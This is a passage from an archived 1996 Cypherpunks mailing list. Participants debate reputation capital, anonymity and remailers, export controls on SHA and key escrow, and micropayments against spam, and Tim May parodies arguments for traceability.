In-Reply-To: <ae54579106021004ce78@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.960905192854.7577A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain


> (I also don't dislike Germans in general. I studied some German in high
> school--don't ask me to use it, though!--and have visited Germany. They
> just have a certain well-known tendency to take the authoritarian path at
> times.)

Agreed :)

I talked to someone about censorship here in Germany
and we both think there is not much around.
Germans are always amused when american film stars come
to a German tv show and ask if they can use words like
fuck on tv. Or the beeps in some songs on mtv Europe.

The only big 'censorship' in Germany concerns
extrem left and right wing texts etc
(e.g. 'Ausschwitzluege', which is, when someone says
ausschwitz is a lie), because it's
illegal to distribute such things.

And some censorship is involved in selling video games,
although the concept is often misunderstood in the US. 
Video Games are not censored and can be bought by adults. 
It's only prohibited to sell these things to kids.

And to this 'Herr Schmidt': most of the people I know
are amused about 'Anglos' using this Herr XXX 
(say on skyone, nbc, etc.) stuff, because
no German uses this phrase in this way :)

And I thought cypherpunks are more open,
concerning some mails I received.

I think I had to say this, so don't bother.

-stephan

PS: and to those who mailed : it`s stephan not stephen ;)  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Fri, 6 Sep 1996 19:31:51 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <fdsul873f9@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
mccoy@communities.com (Jim McCoy) writes:
> Greg Burk writes:
> > Too little incentive to shoot for the heights:
> >
> > Suppose you judge that you've accumulated twice as much "reputation
> > capital" as Joe. How do you get twice as much payoff? It seems to me
> > that above the threshhold of credibility, minor side issues make more
> > difference than your two-fold "reputation capital" differential.
>
> Go read Ender's Game by Orson Scott Card (a good book to read anyway :)
> and examine the nature of the computer network "discussion groups" he talks
> about: a classic example of reputation markets in many-to-many discussions.
> With the proper tools someone with twice the reputation capital in a
> particular category as another will have a greater chance of what they say
> not being filtered out as noise.
 
I have read it, a long time ago. Frankly, it's a spectacularly bad
example. He writes of the two child-protagonists gaining reputations as
great philosophers on a sort of Usenet. (At the time I believe OSC was a
member of Delphi, UNCLEORSON)
 
Look around on the real Usenet. OSC could not have been more wrong.
 
> > As an "asset", it is extremely non-liquid:
> >
> > How exactly would you "convert" your reputation into other capital?
> > Would you accept bribes and tell lies? Seems to me you would only get a
> > one-shot "conversion" and it couldn't possibly hope to equal your
> > investment.
>
> Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have
> converted reputation capital into large piles of money.  Time is an asset
> that has a monetary value to most people, and they are willing to spend money
 
You don't seem to realize you are actually including at least one major
example of a counterfeit reputation here.
 
I speak of Siskel & Ebert, whom I have caught at least once giving a
strikingly dishonest review. I had seen the movie (See You In The
Morning) on opening day, before they reviewed it. It stunk. After the
credits rolled, the audience walked out in sullen silence, unable to
believe they had spent money to see it. Nobody in the entire audience
gave any sign of liking any part of the thing even a little bit. Whereas
they had been talkative and somewhat excited before it started. A few
days later, I saw S&E's review. One of them (Siskel, I think) raved and
raved about it. Perhaps he was the only person in the country who liked
it, but I don't believe that. He gave it a lengthy, raving thumbs-up.
Then the other (Ebert, I think) said "Well, I didn't like it as much as
you did", thumbs down, and *stopped*.
 
Conclusion: They knew it stunk, but for some reason I won't speculate on
they wanted to say they liked it so they misreported it, and covered
their butts with a review that would look mixed later but sound like a
rave now. I see a counterfeit reputation.
 
> No, I think that you just don't understand the mechanics of reputations and
> how they interact with the most important resource in most people's lives:
> time.
 
I'm tempted to tit-for-tat, but I will not refute your points by telling
you you just don't understand.
 
> time.  Instead of thinking of "reputation" look at it from the other end and
> consider the "attention marketplace."
 
Fine, but resolving good vs counterfeit reputations takes time too.
 
> Right now reputation markets have a
> limited presence on the internet (mostly through killfiles) because the tools
> required are not integreated into the tools used to browse the information.
> In time this will change.
 
How? I ask for something more specific than In The Future Everything
Will Be Done Right.
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMi9qsbMyVAabpHidAQFhmwH9HjxB1rgc1DgIZ0eJzidY4CSr7D7s2gCc
qRq+v2APKgIDqjOTt04u+sDgKxeJFb0POBajeV0ARSA61mr3B7mQDA==
=DppT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Fri, 6 Sep 1996 19:38:59 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <543fs4fz39@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
tcmay@got.net (Timothy C. May) writes:
 
> To stick with my restaurant example, consider _advertising_. MacDonald's
> and Burger King spend hundreds of millions of dollars every year claiming
> their "restaurants" are great. Many millions of people obviously are
> swayed. So?
>
> Others choose not to trust the advice of the MacDonald's hucksters. Maybe
> only a tiny fraction choose Chez Panisse over MacDonald's. This is the way
> of the world.
>
> It's still the give and take of reputations. It ain't perfect (in that it
> doesn't produce results I believe are empirically valid and optimum :-}).
> But it's all we have. It's the market. The agora.
 
I'm reading "It's shaky. Accept that." Fine, consider it accepted.
 
I don't think it is comparable to the market, simply because even the
more nebulous market exchanges (say, consultant-on-call) are much more
clearly defined.
 
> >"Reputation capital" is hard to spend down to absolute 0 because it is
> >significant work to distinguish valid "reputation capital" from
> >worthless counterfeit, and it is easy to counterfeit... just talk.
>
> I strongly disagree. It's quite possible for Person A to quickly convert
> his reputation to Person B to a _negative_ value. Real quick, in fact.
 
I don't see how there can be such a thing as negative reputation
capital. Wouldn't that mean B believes the opposite of what A says? If
you anti-believed someone in a consistent manner, couldn't they exploit
that?
 
Also, you are speaking only of 1-to-1 reputation-relationships. But that
is inefficient. The mere fact of having to evaluate each person's
reputation yourself is significant work.
 
On the other hand, you could talk about the transmission of reputations.
This seems more in line with what I understood "reputation" to mean, to
include some element of indirect knowledge. But that's mighty easy to
abuse and therefore mighty hard to trust.
 
For instance, when a certain infamously-low-reputation (deservedly so)
individual recently joined the cypherpunk lists, others who had endured
him in the past tried to relay their impressions of him. It proved very
difficult to convey, and they were somewhat attacked for their efforts
and not entirely believed.
 
In other words, he *could not* spend down to 0, despite years of
unflagging effort.
 
> Perhaps my short article did not fully explain a few things. Reputations
> are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to
> Person B, a reputation R(A,C) to Person C, and so on. (And the matrix may
> be further broken down into reputations for advice on various subjects, in
> various fields, etc.)
 
I can't dispute or agree with your mathematical model until we can agree
on more basic issues.
 
 
> We may lump a lot of folks together and say, for example, that MacDonald's
> has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R
> (Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is,
> and so value the rep of Chez Panisse at near zero).
>
> And so on. Lots of examples could be given.
 
I'll accept your example, but I don't see how the numbers are
meaningful.
 
> Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit.
> How much will anonymous claim hurt MacDonald's? Obviously, not much.
 
Well, how many people did J. Anonymous Gourmand reach, anyways?
 
Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of
people who have never heard of J. Anonymous Gourmand before read a
plausible but false account of the disgustingness of McDonald's food.
Perhaps the same detailed study, just fake. (Not to intertangle this
with other issues, let's further suppose that Ms. Gourmand sneaks in
underneath spam-watcher's radar, and cleverly appears to be on topic in
every group.)
 
Nothing about her reputation has changed, but surely when her claim is
read by millions it will hurt McDonalds a non-trivial amount.
 
Again, that doesn't mean the reputation was not a factor.
 
 
> But
> what if the American Heart Association publishes a detailed study on the
> fat levels of MacDonald's products and declares it to "Dangerous." The
> effect will probably be greater, as R (AHA, many people) = high, and by the
> kind of Dempster-Shafer belief calculus I discussed a few months ago, the
> rep of the AHA propagates semi-transitively to the rep of MacDonald's.
>
> (This all happened recently, with the famous studies of fat levels of movie
> theater food...sales dropped almost overnight, and now the fat levels of
> popcorn, etc., have been changed for the better.)
 
I don't think you are illustrating what you think you are.
 
Consider the American Sociological Association. Wouldn't you say its
reputation is equivalent to the American Heart Association's? Most
people would, I think. And various claims by ASA members have certainly
gotten as much press as anything the AHA has got. But the ASA winks at
severe violations of its Code Of Ethics and lets its members pursue
their Politically Correct agendas at the expense of science. They have
effectively counterfeited a reputation.
 
I've already made the points I wanted to make, so I may not have further
comments.
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMi9qpbMyVAabpHidAQFRnwH8CyCjOnz071ZMWXNNURR/NMSMw9y9bs+n
dutQOqLSNqeJhsYwNZJP2Z1o+JdhWZ7sQ/xnhdWbdupYsoRhcpacpA==
=zcJQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 7 Sep 1996 02:18:32 +0800
To: cypherpunks@toad.com
Subject: Neo-Nazis etc.
Message-ID: <322F9867.7FEF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Try to keep in mind that "Nazis" aren't skinheads and other 
troublemakers exactly, which is to say, those are the first people 
Hitler got rid of when he came to power.

Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we 
know anyone like that?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 6 Sep 1996 19:23:20 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
Message-ID: <199609052028.UAA12733@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 05, 1996 10:27:34, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
Tim's right on the "old fogies." Providing you make the cut off at about
50-55. After that you get retro-infantiles like me (at 61) who have fallen
head over heels for the Internet, and are absolutely fed up with being
"mature-and-responsible" -- that truly sucks, sucks, sucks. 
 
 
Elsewhere in my field (architecture) I get accused by 40-55 year-olds of
trying to brainwash the under-30s. You bet I am, to warn them off the
"mature" assholes who think their warped experience is the best teacher,
when in fact all it teaches is how to be bent out of shape, and how to
project and promote that distortion as the definition of reality. 
 
 
That crippling narrow vision passes at about 50-55 when you realize that
you don't know shit, never did and never will. Every fails, in the end,
well before The End. So what. Laugh, don't go hurt somebody. 
 
 
Yep, self-deception is the certain sign of maturity, get used to it, it's
as unavoidable as the wars mature folks, fearing mortality, wage to kill
the helplessness in themselves. 
 
 
Still, I admire the ingenuity of under-30s and over 55s who can trick the
middling-matures into serving us, keeping us clothed and sheltered -- and
entertained at their pompous fatuities. 
 
 
Don't trust anyone between 30 and 55, especially those nuts with a Solution
for The Problem They've Dreamed Up. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 6 Sep 1996 20:52:17 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Race Bit: C
Message-ID: <199609060330.UAA27245@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 PM 9/5/96 +0000, jonathon wrote:
>On Thu, 5 Sep 1996, Anonymous wrote:
>> defunded 100%, IMO). Violence begats violence which begats even larger
>> government, don't start us on that road -- leave me in peace.

>If I understand you correctly, it is OK for a government to
>institute violence against the residents of the land it claims
>dominion over, but it is not acceptable for the inhabitants of
>that piece of land to respond in self defence.

I think Mr. Anonymous displays a mental crutch that you'll occasionally see: 
 A person who, while he'll not quite admit defending the status quo, 
criticizes alternatives to it yet doesn't have a solution of his own.  He 
says he wants to be left "in peace," forgetting that most people in the 
world today are NOT left in peace.

The way I see it, the status quo doesn't come "pre-justified":  It needs 
just as much a defense as any other proposal.  Its main advantage is that it 
tends to be more understood that most hypotheticals, because it's been 
tested. Sadly, people tend to ignore its disadvantages, to to excess 
familiarity.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 6 Sep 1996 19:04:22 +0800
To: jya@pipeline.com (John Young)
Subject: Re: GAK by TIS
In-Reply-To: <199608302326.XAA02261@pipe2.t1.usa.pipeline.com>
Message-ID: <199609060148.UAA03173@homeport.org>
MIME-Version: 1.0
Content-Type: text


To the editor,

	Its important to note that the Clinton administration has not
vowed to end export restrictions on key escrowed products.  The
administration has agreed to let out relatively weak 64 bit products,
if they are escrowed.  This is far below the minimum key length of 80
bits recommended by Schneier, Rivest, Blaze, et al.  (To be fair, this
is noted deep inside the article.)

	The Clinton administration seems to expect overseas business
to buy software with the spying functions built in and publicized.  It
is more likely that US software companies will continue to suffer
until such time as the administration realizes that strong crypto is
not only not going to disappear, but flourish as it enables online
commerce.

Adam Shostack


|    Network World, August 26, 1996, Page 1 
|    Key-escrow firewall ready to leave the country 
|  
|    by Ellen Messner, Washington D.C. 
|  
|  
|    After months of talk about exporting encryption software, 
|    there will finally be action. 
|  
|    Fulfilling the Clinton Administration's vow to end export 
|    restrictions on strong encryption products if they use 
|    key-escrow features, the U.S. government this week is 
|    expected to permit Trusted Information Systems, Inc. 
|    (TIS) to sell its Data Encryption Standard (DES)-equipped 
|    Gauntlet firewall overseas. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Fri, 6 Sep 1996 19:10:22 +0800
To: cypherpunks@toad.com
Subject: <none>
Message-ID: <TCPSMTP.16.9.5.-12.56.24.2645935021.690872@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> what do you know about hackers

 More than you appariently...


 P.J.
 pjn@nworks.com


... Nothing is opened more often by mistake than YOUR mouth.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 6 Sep 1996 21:23:16 +0800
To: cypherpunks@toad.com
Subject: Re: rc2 export limits..
In-Reply-To: <199609051547.LAA07458@jekyll.piermont.com>
Message-ID: <Pine.A32.3.91.960905203549.46749B-100000@fn1.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


keywords: block cipher, Bruce Schneier, SHA, ITAR

Thanks to Perry Metzger and Andrew Loewenstern for their responses to
my question viz: Why is SHA export controlled?  I should always check
_Applied Cryptography_ first before I ask a question.  And I guess now 
that I have two copies, I could leave the red one at the office and 
bring the blue one home.  

I didn't reply to Andrew Loewenstern and Perry Metzger separately,
because I think they both read the list, and I think replying to both 
might be bad form in those cases where the person is known to read the 
list.


on the subject of anonymity, maybe some folks have yet to understand 
the binary nature of it.  If there are exceptions to anonymous writing 
that can be enforced against the writer, then it's over.  Either others 
will be able to compel discovery of anonymous writers' True Names or 
they won't.  

If methods exist that permit writers to remain anonymous with very high
degrees of assurance that their true identities will not be found out,
then we will have anonymity.  It's either one or the other.  Anonymity
can be used to produce hate speech, lies, posting of intellectual
property, and other things that many of us would rather not see.  But, 
that is the price of having anonymity where it is needed and valuable.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 6 Sep 1996 18:46:49 +0800
To: "P. J. Ponder" <cypherpunks@toad.com
Subject: Re: rc2 export limits..
Message-ID: <199609060629.XAA27790@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:23 AM 9/5/96 -0400, P. J. Ponder wrote:
>The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in 
>the fine print at the beginning that SHA is export controlled.  I don't 
>have the document to refer to right now, but it plainly states that SHA  
>falls under ITAR.  As a cryptographic hash function, why would it be 
>controlled in this way?
>
>How can I use SHA to encrypt something for someone else to decrypt?  I 
>know how to use it for authentication; am I missing something here?

Any secure hash can be used as a stream cypher.  Concatenate your key and a
block serial number (never to be reused) to get a number to exclusive or
with the plain text.  When you need a new block, use the next sequential
serial number.  (See Applied Cryptography)

Raw SHA probably isn't exportable because people can use it for crypto.  If
your use of SHA was bundled into a OS password scheme, you could probably
get a CJ on it and export it.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne Clerke" <wclerke@emirates.net.ae>
Date: Fri, 6 Sep 1996 19:15:29 +0800
To: <cypherpunks@toad.com>
Subject: Re: Using Compromised Remailers to Get the Goods
Message-ID: <199609052137.BAA04432@ns2.emirates.net.ae>
MIME-Version: 1.0
Content-Type: text/plain


> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Using Compromised Remailers to Get the Goods
> Date: Thursday, 5 September 1996 8:28

< ... >

> (For example, full sender untraceablility means that sources within
police
> departments can go home, log on with the own PCs, and sell
information
> about pending investigations, modulo their concerns about pointing
to
> themselves with information provided (see "canary traps"). 

Heh ... is this a 'whistle-SUCKER'?   :-)

> 
> --Tim May
> 
 
EMail: wclerke@emirates.net.ae
PGP key ID: AEB2546D		FP: D663D11E DA19D74F 5032DC7E E001B702
PGP mail welcome.		Voice: +971 506 43 48 53
<a href=mailto:wclerke@emirates.net.ae>Wayne Clerke</a>
If you're not living on the edge, you're taking up too much space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Fri, 6 Sep 1996 21:45:10 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960904201419.16143B-100000@polaris>
Message-ID: <Pine.BSI.3.91.960906012935.9846A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Not just DC and Chicago, I'm afraid.  If anyone around NYC noticed, there 
are less and less payphones, and all new ones installed, just about, are 
those yellow credit card phones.  Not all of them, but it's now one for 
one, at least.

=Millie=
PS: i wrote a fiction book about this a few years ago -- i should have 
published. People could've said i was the next nostradamus. :( 

On Wed, 4 Sep 1996, Black Unicorn wrote:

> On Wed, 4 Sep 1996, Vladimir Z. Nuri wrote:
> 
> > 
> > jim bell <jimbell@pacifier.com>
> > >"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
> > >decades, people have been able to walk up to a pay telephone at 3:00 AM and 
> > >make a harassing phone call to somebody, a "problem" which still exists and 
> > >no solution is being implemented for.
> 
> Incidently, this is being "solved."
> 
> In D.C. and Chicago the solution is to rip up the payphones and not permit
> new ones to be installed.
> 
> If anyone objects the officals responsible make a wide gesture and say "We
> didn't take away your phones, CRIMINALS took away your phones."
> 
> > amusing the way you phrase that-- you didn't say, "phone", but "pay 
> > phone". the statement used to hold in general for all "phones", but
> > then caller id, caller blocking, etc. have been introduced that
> > make this no longer true. so in a very real sense, anonymity in 
> > the phone system was considered a "problem" by some that has been
> > "solved" or "modified" by some recent advancements. (yes, most people
> > agree caller ID is an advancement).
> > 
> 
> Yet today one can go out and rent a cell phone on the street, or even pay
> for one's activation in cash up front without presenting any real identity
> documents.
> 
> The real question is this, what are you going to do to anihilate anonymous
> communication, because if you think its harmful that's what you have to
> do.
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Fri, 6 Sep 1996 22:53:01 +0800
To: cypherpunks@toad.com
Subject: Conservation Laws, Money, Engines, and Ontology (fwd)
Message-ID: <Pine.SUN.3.91.960906014039.21664B-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


Suggest you look at draft-eastlake-internet-payment-*.txt in the
IETF shadow directories.  I don't think any one step will solve all
our spam problems but I wouldn't mind spending, say, 5 cents for each 
real piece of mail I sent outside my company and if end machines charged 
5 cents per piece of ouside mail received, I think spamming would be 
crippled.  (Note that with bad guy lists, you could collect the money and 
then just throw away the mail.)

Donald (not on cypherpunks)

=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
http://www.cybercash.com           http://www.eff.org/blueribbon.html

---------- Forwarded message ----------
Date: Sun, 1 Sep 1996 19:47:15 -0400
From: Robert Hettinga <rah@shipwright.com>
To: dcsb@ai.mit.edu
Subject: Conservation Laws, Money, Engines, and Ontology


Date: Sun, 1 Sep 1996 11:35:28 -0700
Mime-Version: 1.0
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Conservation Laws, Money, Engines, and Ontology

Keywords: agoric systems, computational ecologies, resource auctioning,
Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed
trust, metered usage, software objects, software ICs, superdistribution,
Brad Cox, emergent order.

In physics there are various conservation laws: conservation of energy,
mass, charge, and whatnot. You all know about this... Conservation of mass
says that mass is neither created nor destroyed. (For smart aleck
quibblers, conservation of mass-energy.)

How does this relate to our issues?

"Abuse of Resources": Mail loops, infinite loops, spamming, overloads of
networks, and congestion in general are cases where "unrealistic" models of
costs are implemented in software. In the real physical world, infinite
loops don't occur (at least not in the sense seen with mail loops, as a
relevant example.)

Conservation laws are related to the "cost model" of the universe. Real
physical objects have costs, or ontological status, or presence.... (Please
don't read too much into this point...I mean to be suggestive, not
literal.)

There are no "memory leaks" in the universe which suddenly fill it up with
stuff, no perpetual motion machines, no creation and destruction of
objects.

Cyberspace Ontologies: There are several things which need to be done to
make the cyberspatial world more like the spatial world:

* payment for CPU cycles consumed (via contractual, permission-based
access: "If you want access to this machine, here are the terms and
conditions.")

* metering mechanisms, such as e-stamps for e-mail (essentially a special
case of the first point, where a machine says "I'll pass on your message if
you pay me to.")

* digital contracts, agreements on usage and payment  (resource auctioning,
or the "smart contracts" that Nick Szabo has written about)

(you can all think of additional examples....)

Cryptographic protocols have their uses here, but there are also some other
measures which bear looking into. In the LISP community, for example, work
has been done on "engines," which are building blocks that are "fueled up"
with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one
could put an engine into a process and it would run for some number of
ticks, then stop.

(I'm sure there are Unix-level tools which do similar things, in terms of
giving a spawned process so many ticks of the clock. The "engines" concept
is somewhat more semantically clean, in that it's pushed down into the
"ontology" of the thing being simulated or run, and is not at the "God
level" (to use a non-technical term!).)

Now, certainly I support the right of any person or machine to run programs
freely and without charge, to pass on e-mail free of charge, to run
remailers for no charge, to accept spam mail without complaint, and so on.

What I'm suggesting is that many of the problems being seen with overuse of
resources, spam, congestion, and denial of service are really due to a poor
model of resource allocation. Unix and other modern operating systems offer
various tools for helping to constrain such problems, but, I submit, better
methods are needed.

(Especially when multiple machines, networks, and even anonymous sites are
part of the overall system....clearly the constraints must be managed
locally, and via "contract," as part of a computational ecology, and not as
a hierarchical, top down Unix-type operating system.)

Economics is about the "allocation of scarce resources." Many of the
existing models being used treat various scarce resources as _free_. Then,
when the inevitable problems occur, calls for top-down regulation are heard
(e.g., the frequent calls for illegalization of "unwanted mail").

In my view, building a consistent, distributed, "conservative" system is
what Cypherpunks need to be thinking about.

(I used the term "conservative" in the physics sense. A system in which
various conservation laws are obeyed.)

As I said before, this should not be compelled, but voluntary. However,
those who give their resources away for free (choosing not to adopt a
conservative ontology, in other words) should be in no position to complain
or run to the government for top-down regulation because there freely-given
resources are being overused or "abused" (in their thinking).


And closely related to this whole issue--and something I've written about
extensively--is the issue of "building walls in cyberspace." In the real
world, persistent structures are build out of real materials, resulting in
castles, forts, skyscrapers, bridges, houses, highways, etc. These objects
have persistence, have controllable access (gates, doors, locks,...), and
have "structural integrity."

Cryptographic and distributed trust protocols are about the only means I
can think of for constructing the equivalents in cyberspace. (And to a
large extent, this is already happening: the Net and the Web have structure
which cannot be demolished casually, or by top-down orders from any single
national leader. Millions of machines, linked in various ways and
implementing various protocols and "terms of service" with users and other
machines....an early version of the "conservative" system I think we'll
someday see.)

Well, this gives the flavor of my points. I haven't rigorously argued all
of the points, but the Cypherpunks forum is for presenting informal
arguments.

Thoughts?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 04:32:07 +0800
To: cypherpunks@toad.com
Subject: Re: Reputations
Message-ID: <ae55a3d400021004262f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:11 AM 9/6/96, Greg Burk wrote:

>> I strongly disagree. It's quite possible for Person A to quickly convert
>> his reputation to Person B to a _negative_ value. Real quick, in fact.
>
>I don't see how there can be such a thing as negative reputation
>capital. Wouldn't that mean B believes the opposite of what A says? If
>you anti-believed someone in a consistent manner, couldn't they exploit
>that?

Well, I suppose that if you don't believe in negative repuation capital,
I'm not going to be able to spend enough time to convince you. It's like
someone saying they're not sure such a thing as "entropy" exists.


>For instance, when a certain infamously-low-reputation (deservedly so)
>individual recently joined the cypherpunk lists, others who had endured
>him in the past tried to relay their impressions of him. It proved very
>difficult to convey, and they were somewhat attacked for their efforts
>and not entirely believed.
>
>In other words, he *could not* spend down to 0, despite years of
>unflagging effort.

No, with many of the list members, his reputation was in fact negative.
They disbelieved nearly anything he had to say, and his approval of some
idea was largely cause for others to take the opposite tack. About as clear
an example of a negative reputation as one can find. (Note that I am not
saying his reputation is negative with _me_.)



>I've already made the points I wanted to make, so I may not have further
>comments.

Nor me.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Sep 1996 05:35:42 +0800
To: cypherpunks@toad.com
Subject: "The Bill of Rights can be dangerous...."
Message-ID: <ae55a5aa010210049488@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 PM 9/5/96, Omegaman wrote:

>What strikes me as odd is that the arguments against anonymous
>communication are nearly identical to those against strong crypto.
>ie. the same four horsemen flare up in these discussions.  Yet we
>have parties who are ostensibly pro-crypto but anti-anonymity.
>
>To put it in a nutshell, in a free society I can have a private
>conversation, but I must essentially announce that I am having one
>and who I am having that conversation with?

As with Adam Back's mini-rant yesterday, this is exactly correct. In a free
society, speech need not be approved, registered, escrowed, labelled, or
identified with the Registered True Name of the speaker.

One can paraphrase Esther Dyson's concerns about anonymity in several
fairly equivalent forms.

Here's the original:

"Anonymity can be dangerous -- as can traceability, especially in/by
repressive regimes.  Therefore I would favor allowing anonymity -- with
some form of traceability only under terms considerably stronger than what
are generally required for a wiretap."

Here's a slightly paraphrased version for freedom to read anonymously, with
some "reasons" included in brackets:

"Books and magazines can be dangerous [bomb recipes, racial hatred,
instilling bad values, etc.]-- as can restrictions on reading, especially
in/by repressive regimes.  Therefore I would favor allowing unfettered
reading -- with some form of traceability only under terms considerably
stronger than what are generally required for a wiretap."

(i.e., "book escrow," where one's reading materials are escrowed with
Trusted Authorities, and only accessed by law enforcement under Proper
Conditions. Failure to escrow reading materials would be a Class B felony.
Cf. the FBI's Library Awareness Program of circa 1987-8.)

A version for freedom of movement:

"People moving around can be dangerous [avoiding parental responsibilities,
avoiding taxes, spying, plotting to bomb buildings]-- as can traceability,
especially in/by repressive regimes.  Therefore I would favor allowing
freedom of movement -- with some form of traceability only under terms
considerably stronger than what are generally required for a wiretap."

(a la the "position escrow system" I predicted a couple of years ago would
someday be seriously considered)

A version for freedom of association:

"Freedom of association can be dangerous [plotting of crimes, gathering of
mobs, spread of dangerous ideas, disease]-- as can restrictions on such
gatherings, especially in/by repressive regimes.  Therefore I would favor
allowing freedom of association -- with some form of traceability only
under terms considerably stronger than what are generally required for a
wiretap."

("Club escrow"? All mailing lists, clubs, associations, and such would have
to escrow an up-to-date list of members, associates, and contacts. Then,
with proper authorization by proper authorities, law enforcement could
inspect these lists to see who had been meeting with whom. Hotels would
have to monitor use of rooms by more than two persons (the two person case
is already covered by the "Sex can be dangerous..." variant of the Dyson
Principle).)

A version for anonymous purchases and sales:

"Anonymity in sales and purchases can be dangerous [bomb materials, stolen
goods, unhealthful foods, etc.] -- as can traceability, especially in/by
repressive regimes.  Therefore I would favor allowing anonymous purchases
and sales of goods -- with some form of traceability only under terms
considerably stronger than what are generally required for a wiretap."

(There go the flea markets and garage sales (for buyers), which are largely
anonymous. There goes walking into a store and paying cash for a piece of
